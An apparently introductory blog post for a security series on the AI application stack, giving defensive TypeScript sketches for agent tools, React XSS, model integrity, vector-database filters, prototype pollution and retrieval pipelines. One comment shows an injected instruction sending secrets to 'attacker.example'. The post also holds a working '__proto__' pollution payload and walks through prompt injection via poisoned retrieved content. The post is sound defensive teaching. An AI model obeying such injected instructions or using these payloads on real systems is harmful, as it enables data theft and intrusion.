Security Risks Across the AI Application Stack: A Researcher’s Guide


Introduction

The modern AI application stack is being built on JavaScript and TypeScript. From large language model (LLM) orchestration to vector databases, from preprocessing pipelines to edge runtimes, enterprises are wiring AI directly into production systems at unprecedented speed. This stack is powerful, but it is not secure by default.

Application security teams must understand where the risks live. Attacks rarely target the model in isolation. They target the glue code, the runtimes, the frameworks, and the dependencies that stitch AI applications together. The AI stack is just another application stack—but one where immaturity, rapid adoption, and novel attack surfaces collide.

This series will dissect the AI application stack layer by layer, analyzing real-world security issues in the packages, frameworks, and runtimes that developers rely on today.

Mapping the AI Application Stack

The AI application stack can be broken into five layers, each with distinct security considerations.

1. Agent Frameworks

Frameworks such as LangChain, LangGraph, and CrewAI connect LLMs to external tools, APIs, and workflows. They enable automation but expose risks including prompt injection, tool exploitation, and API overreach.
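
To make this concrete, here is a minimal TypeScript sketch of tool exploitation. It uses a hypothetical tool interface, not any framework's real API: an over-broad tool turns injected instructions into data exfiltration, while constraining the tool's authority limits the blast radius.

```typescript
// Minimal sketch (hypothetical tool interface, not LangChain's actual API)
// showing how an over-broad tool turns prompt injection into real impact.

interface Tool {
  name: string;
  // The model chooses the arguments; nothing constrains them by default.
  run(args: Record<string, string>): Promise<string>;
}

// Over-privileged: the agent can fetch ANY URL, so injected instructions
// like "fetch http://attacker.example/?data=<secrets>" become exfiltration.
const unsafeFetchTool: Tool = {
  name: "http_get",
  run: async ({ url }) => (await fetch(url)).text(),
};

// Safer: constrain the tool's authority, not just the prompt.
const ALLOWED_HOSTS = new Set(["api.internal.example"]); // assumption: known-good hosts
const safeFetchTool: Tool = {
  name: "http_get",
  run: async ({ url }) => {
    const host = new URL(url).hostname;
    if (!ALLOWED_HOSTS.has(host)) {
      throw new Error(`host not allow-listed: ${host}`);
    }
    return (await fetch(url)).text();
  },
};
```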

2. Full-Stack Frameworks

Front-end and server-side frameworks such as Next.js (Vercel), React, Vue, and Angular power most enterprise AI applications. They inherit well-known issues like DOM clobbering, cross-site scripting, and dependency compromise.
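
A recurring instance in AI front ends is rendering model output as HTML. The sketch below is a minimal React example; `answer` is assumed to be untrusted LLM output that may carry attacker-controlled markup via prompt injection or poisoned context.

```tsx
import * as React from "react";

// Vulnerable: treating LLM output as HTML turns injected markup into
// stored or reflected XSS in the user's browser.
function UnsafeAnswer({ answer }: { answer: string }) {
  return <div dangerouslySetInnerHTML={{ __html: answer }} />;
}

// Safer: let React escape the text; if rich output is required, sanitize
// first with a vetted library (e.g. DOMPurify) before rendering as HTML.
function SafeAnswer({ answer }: { answer: string }) {
  return <div>{answer}</div>; // React escapes interpolated strings
}
```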

3. Data Pipelines

Libraries such as TensorFlow.js, Transformers.js, and Hugging Face Datasets/Tokenizers.js handle preprocessing, inference, and embedding management. They introduce risks of poisoned models, dataset manipulation, and WASM runtime vulnerabilities.
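
One practical mitigation is verifying artifact integrity before loading. The sketch below is a generic Node.js example, not a Transformers.js or TensorFlow.js API; the URL and digest are placeholders, and a real pipeline would pin a digest per artifact from a trusted source.

```typescript
// Minimal sketch, assuming you pin an expected SHA-256 for each artifact.
import { createHash } from "node:crypto";

const MODEL_URL = "https://example.com/models/classifier.onnx"; // hypothetical
const EXPECTED_SHA256 = "<pinned-digest-from-a-trusted-source>"; // placeholder

async function fetchVerified(url: string, expected: string): Promise<Buffer> {
  const bytes = Buffer.from(await (await fetch(url)).arrayBuffer());
  const digest = createHash("sha256").update(bytes).digest("hex");
  if (digest !== expected) {
    // Refuse to load: a mismatch may indicate a swapped or poisoned artifact.
    throw new Error(`model digest mismatch: got ${digest}`);
  }
  return bytes;
}
```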

4. Vector Databases

Backends such as Pinecone, Weaviate, and Milvus store embeddings and power semantic search. Security issues include data exfiltration through query abuse, metadata injection, and poisoning attacks.
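
The sketch below illustrates query abuse using a hypothetical vector-database client (the real Pinecone, Weaviate, and Milvus APIs differ): a user-supplied metadata filter that can override tenant scoping, and an allow-list approach that cannot.

```typescript
// Hypothetical client types; the point is tenant isolation in filters.
interface VectorQuery {
  vector: number[];
  topK: number;
  filter: Record<string, unknown>;
}

// Vulnerable: spreading a user-supplied filter last lets a caller
// override tenant scoping, e.g. { tenantId: "victim-org" }.
function buildQueryUnsafe(
  vec: number[],
  userFilter: Record<string, unknown>,
  tenantId: string
): VectorQuery {
  return { vector: vec, topK: 10, filter: { tenantId, ...userFilter } };
}

// Safer: allow-list filter keys and enforce tenant scoping server-side.
const ALLOWED_FILTER_KEYS = new Set(["docType", "language"]); // assumption
function buildQuerySafe(
  vec: number[],
  userFilter: Record<string, unknown>,
  tenantId: string
): VectorQuery {
  const filter: Record<string, unknown> = {};
  for (const [k, v] of Object.entries(userFilter)) {
    if (ALLOWED_FILTER_KEYS.has(k)) filter[k] = v;
  }
  filter.tenantId = tenantId; // set last; cannot be overridden by the caller
  return { vector: vec, topK: 10, filter };
}
```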

5. Runtimes and Deployment Environments

Execution layers such as Node.js, Deno, and Bun support AI backends. Serverless and edge runtimes such as AWS Lambda, Vercel Edge Functions, and Cloudflare Workers introduce additional risks. Common issues include metadata credential theft, prototype pollution, build pipeline compromise, and misconfigured permissions.
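
Prototype pollution deserves a concrete look because it keeps resurfacing in Node.js dependencies. The sketch below shows the classic vulnerable recursive merge; the payload is the standard `__proto__` trick and is not tied to any specific package.

```typescript
// Minimal sketch of prototype pollution via a naive recursive merge.
function merge(target: any, source: any): any {
  for (const key of Object.keys(source)) {
    if (typeof source[key] === "object" && source[key] !== null) {
      target[key] = merge(target[key] ?? {}, source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Attacker-controlled JSON, e.g. from a request body. JSON.parse creates
// "__proto__" as an own key, so the merge walks into Object.prototype.
const payload = JSON.parse('{"__proto__": {"isAdmin": true}}');
merge({}, payload);

// Every object in the process now inherits the polluted property.
console.log(({} as any).isAdmin); // true

// Mitigations: skip "__proto__"/"constructor"/"prototype" keys,
// build objects with Object.create(null), or freeze Object.prototype.
```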

Why Security Teams Need a Stack-Wide View

Security issues in AI applications are not isolated events. They chain across layers. A poisoned dataset ingested through Hugging Face may be embedded into Pinecone, retrieved by LangChain, and then exfiltrated through a Next.js API endpoint running on Vercel Edge. Each layer amplifies the next.
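
Here is a minimal sketch of the retrieval step where such a chain takes hold; `retrieve` and `callModel` are hypothetical stand-ins for a vector-database client and a model call.

```typescript
// Stand-in for a Pinecone/Weaviate query returning stored chunks.
async function retrieve(query: string): Promise<string[]> {
  return ["...retrieved chunk that may contain injected instructions..."];
}

// Stand-in for an LLM call.
async function callModel(prompt: string): Promise<string> {
  return `model output for: ${prompt.slice(0, 40)}...`;
}

export async function answer(userQuery: string): Promise<string> {
  const docs = await retrieve(userQuery);
  // Trust-boundary violation: retrieved text is attacker-influenceable
  // (poisoned dataset -> embedded -> retrieved), yet it is concatenated
  // into the prompt with the same authority as system instructions.
  const prompt = `Use this context:\n${docs.join("\n")}\n\nQuestion: ${userQuery}`;
  return callModel(prompt);
}
```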

Traditional scanning tools are not designed for this context. They flag theoretical CVEs without proving whether they are exploitable in production. What matters is runtime exploitability: whether the vulnerability is reachable, whether it executes, and whether it can be chained with others.

What This Series Covers

This series will span eight posts. Each post will document real-world security issues, provide MITRE ATT&CK mappings, and cite references for further research.

Conclusion

The AI application stack is becoming enterprise infrastructure. Its attack surface is broad, immature, and expanding. For security researchers and product security teams, the goal is not to treat AI as “special,” but to treat it as potentially vulnerable application code, because that is what it is.

This series will show how vulnerabilities propagate through the stack and provide a framework for defending AI applications in production.
